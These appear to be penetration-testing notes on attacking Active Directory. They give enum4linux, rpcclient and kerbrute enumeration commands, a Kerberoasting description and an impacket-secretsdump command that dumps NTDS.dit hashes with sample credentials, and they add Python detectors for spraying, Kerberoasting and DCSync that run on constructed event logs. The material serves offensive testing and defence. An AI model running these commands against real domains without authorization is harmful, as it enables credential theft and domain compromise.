# Active Directory

## Attack Workflow

Determine what ports are open.

Enumerate with:

* [ ] Determine open ports
  * [ ] Scan ports with Nmap to fingerprint services
* [ ] Enumerate AD information
  * [ ] Domain info
  * [ ] rpcclient
  * [ ] enum4linux
* [ ] Get list of users
  * [ ] If a list is not available, brute-force usernames
  * [ ] Determine whether Kerberos pre-authentication is enforced
  * [ ] Determine which users have SPNs (Service Principal Names)

## enum4linux

Used to enumerate a huge amount of AD information from the command line.

```bash
enum4linux -a 10.1.1.10        # Attempts to enumerate everything at target
enum4linux -u administrator -p password -U 10.1.1.10    # Use stolen creds to enumerate all users
enum4linux -S 10.1.1.10        # Attempt to gather SMB shares
```

## rpcclient

Used to enumerate information about a system over RPC.

Gather a list of domain accounts with `rpcclient` and save the usernames to a file:

```bash
# enumdomusers prints lines like "user:[name] rid:[0x3e8]"; the awk pipeline keeps only the name
rpcclient -U 'GOBLINS\printerldap%SecurePassword1' 10.0.0.1 -c 'enumdomusers;exit' | awk -F '[' '{print $2}' | awk -F ']' '{print $1}' > goblinUsers.txt
```

## Password Spraying

A tool such as Talon can run password-spray attacks across an AD environment.

## Kerberos

Kerbrute is used to run various Kerberos attacks and is written in Go: <https://github.com/ropnop/kerbrute>

```bash
# Enumerate valid usernames against the DC from a wordlist
./kerbrute_linux_amd64 userenum --dc 10.10.107.154 -d spookysec.local ../userlist.txt
```

## Kerberoasting

Using a valid account on a pwned box, we can request tickets for service accounts and extract the hash to crack offline. We must find all accounts in AD which have an SPN (Service Principal Name), then request RC4 tickets from the DC.
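The three Kerberos-facing steps above (Kerbrute `userenum`, password spraying, and Kerberoasting) each leave a distinct pattern in the Security log of the DC. The following is an added example, not code from these notes or from any of the tools named, showing that detection logic run over constructed event records. The `key=value` line format, the event records, and the thresholds are assumptions for the example; the event IDs and status codes (4768 with `0x6`, 4771 with `0x18`, 4769 with ticket encryption `0x17`) are the real Windows values.

```python
"""Added example: detect username enumeration, password spraying and
Kerberoasting from (constructed) Windows Security event records."""
from collections import defaultdict

# Constructed sample events in an assumed "key=value" line format.
#   4768 = TGT requested, 4771 = pre-authentication failed, 4769 = service ticket requested
SAMPLE_EVENTS = """\
id=4768 src=10.0.0.50 user=zzz-nope status=0x6
id=4768 src=10.0.0.50 user=qqq-nope status=0x6
id=4768 src=10.0.0.50 user=ppp-nope status=0x6
id=4768 src=10.0.0.50 user=alice status=0x0
id=4771 src=10.0.0.60 user=alice status=0x18
id=4771 src=10.0.0.60 user=bob status=0x18
id=4771 src=10.0.0.60 user=carol status=0x18
id=4771 src=10.0.0.60 user=dave status=0x18
id=4771 src=10.0.0.61 user=erin status=0x18
id=4771 src=10.0.0.61 user=erin status=0x18
id=4769 src=10.0.0.70 user=alice service=svc_sql ticket_enc=0x17
id=4769 src=10.0.0.70 user=alice service=svc_web ticket_enc=0x17
id=4769 src=10.0.0.70 user=alice service=svc_backup ticket_enc=0x17
id=4769 src=10.0.0.70 user=alice service=svc_ldap ticket_enc=0x17
id=4769 src=10.0.0.71 user=bob service=svc_sql ticket_enc=0x12
"""


def parse_events(text):
    """Parse one event per non-empty line; each line is space-separated key=value pairs."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            events.append(dict(tok.split("=", 1) for tok in line.split()))
    return events


def detect_user_enumeration(events, threshold=3):
    """Username enumeration: one source sends AS-REQs for many *nonexistent*
    principals (4768 with KDC_ERR_C_PRINCIPAL_UNKNOWN, status 0x6)."""
    unknown_by_src = defaultdict(set)
    for e in events:
        if e["id"] == "4768" and e["status"] == "0x6":
            unknown_by_src[e["src"]].add(e["user"])
    return sorted(src for src, users in unknown_by_src.items() if len(users) >= threshold)


def detect_password_spray(events, threshold=3):
    """Spraying: one source fails pre-auth (4771, KDC_ERR_PREAUTH_FAILED 0x18)
    against many *distinct* accounts, unlike one user mistyping a password."""
    failed_by_src = defaultdict(set)
    for e in events:
        if e["id"] == "4771" and e["status"] == "0x18":
            failed_by_src[e["src"]].add(e["user"])
    return sorted(src for src, users in failed_by_src.items() if len(users) >= threshold)


def detect_kerberoasting(events, threshold=3):
    """Kerberoasting: one account requests RC4-HMAC (0x17) service tickets for
    many distinct SPNs; AES tickets (0x11/0x12) are the expected baseline."""
    rc4_by_user = defaultdict(set)
    for e in events:
        if e["id"] == "4769" and e["ticket_enc"] == "0x17":
            rc4_by_user[e["user"]].add(e["service"])
    return sorted(user for user, svcs in rc4_by_user.items() if len(svcs) >= threshold)


def run_detections(text=SAMPLE_EVENTS):
    """Run all three detectors over the sample and return the hits by category."""
    events = parse_events(text)
    return {
        "user_enumeration_sources": detect_user_enumeration(events),
        "password_spray_sources": detect_password_spray(events),
        "kerberoasting_accounts": detect_kerberoasting(events),
    }


if __name__ == "__main__":
    for name, hits in run_detections().items():
        print(f"{name}: {hits}")
```

The constructed records carry no timestamps, so the detectors count distinct names per source or per account without a time window; a production version would bucket by window and tune the thresholds to the environment. Note that the spray detector keys on distinct accounts per source, which is what separates spraying from a single user locking themselves out, and the Kerberoasting detector keys on the RC4 encryption type the attack requests, which is why moving service accounts to AES-only keys both weakens the attack and makes remaining RC4 requests stand out.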

## secretsdump

Used to extract hashes from a server. The command below will dump the contents of NTDS.dit, assuming that you have an account with the required permissions.

```bash
# -just-dc: dump only the NTDS.dit data (NTLM hashes and Kerberos keys), not local SAM/LSA secrets
impacket-secretsdump -just-dc backup:backup2517860@10.10.107.154
```
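`-just-dc` obtains NTDS.dit contents by asking the DC to replicate directory changes, which is the same request a peer DC makes. The following is an added example, not code from these notes or from Impacket, of a detector for that behaviour using event 4662 ("An operation was performed on an object"): a subject that exercises the replication control-access rights without being a known domain-controller account is the signal. The sample 4662 records, the DC account list and the non-replication GUID are constructed; the two replication-right GUIDs are the real values Active Directory uses.

```python
"""Added example: flag directory replication (DCSync-style NTDS.dit extraction)
performed by accounts that are not domain controllers, from constructed 4662 events."""
import re

# Control-access rights that replication requires (real AD values).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Assumed list of legitimate domain-controller computer accounts.
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}

# Constructed 4662 records. "properties" mimics the event's Properties field,
# which lists the access-right GUIDs in braces; the third GUID is made up.
SAMPLE_4662 = [
    {"subject": "DC02$", "object_type": "domainDNS",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"subject": "backup", "object_type": "domainDNS",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"subject": "alice", "object_type": "user",
     "properties": "{11111111-2222-3333-4444-555555555555}"},
]

GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")


def extract_guids(properties):
    """Return the set of GUIDs named in a 4662 Properties string, lower-cased."""
    return {g.lower() for g in GUID_RE.findall(properties)}


def detect_dcsync(events, known_dcs=KNOWN_DC_ACCOUNTS):
    """Return (subject, rights_used) for every event where a non-DC account
    exercised a replication right against the domain naming context."""
    hits = []
    for e in events:
        used = REPLICATION_RIGHTS & extract_guids(e["properties"])
        if used and e["object_type"] == "domainDNS" and e["subject"] not in known_dcs:
            hits.append((e["subject"], sorted(used)))
    return hits


if __name__ == "__main__":
    for subject, rights in detect_dcsync(SAMPLE_4662):
        print(f"replication by non-DC account {subject}: {rights}")
```

Event 4662 only records these operations when Directory Service Access auditing is enabled and the domain object carries a SACL for the replication rights, so the audit policy is a prerequisite of the detector. The account list is kept as an explicit allow-list rather than inferred from the `$` suffix, because any computer account name ends in `$` and that alone does not make it a DC.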

![AD Detailed Mind Map](/files/96MvNqmMQjK3F9ePVCK3)

<https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg>

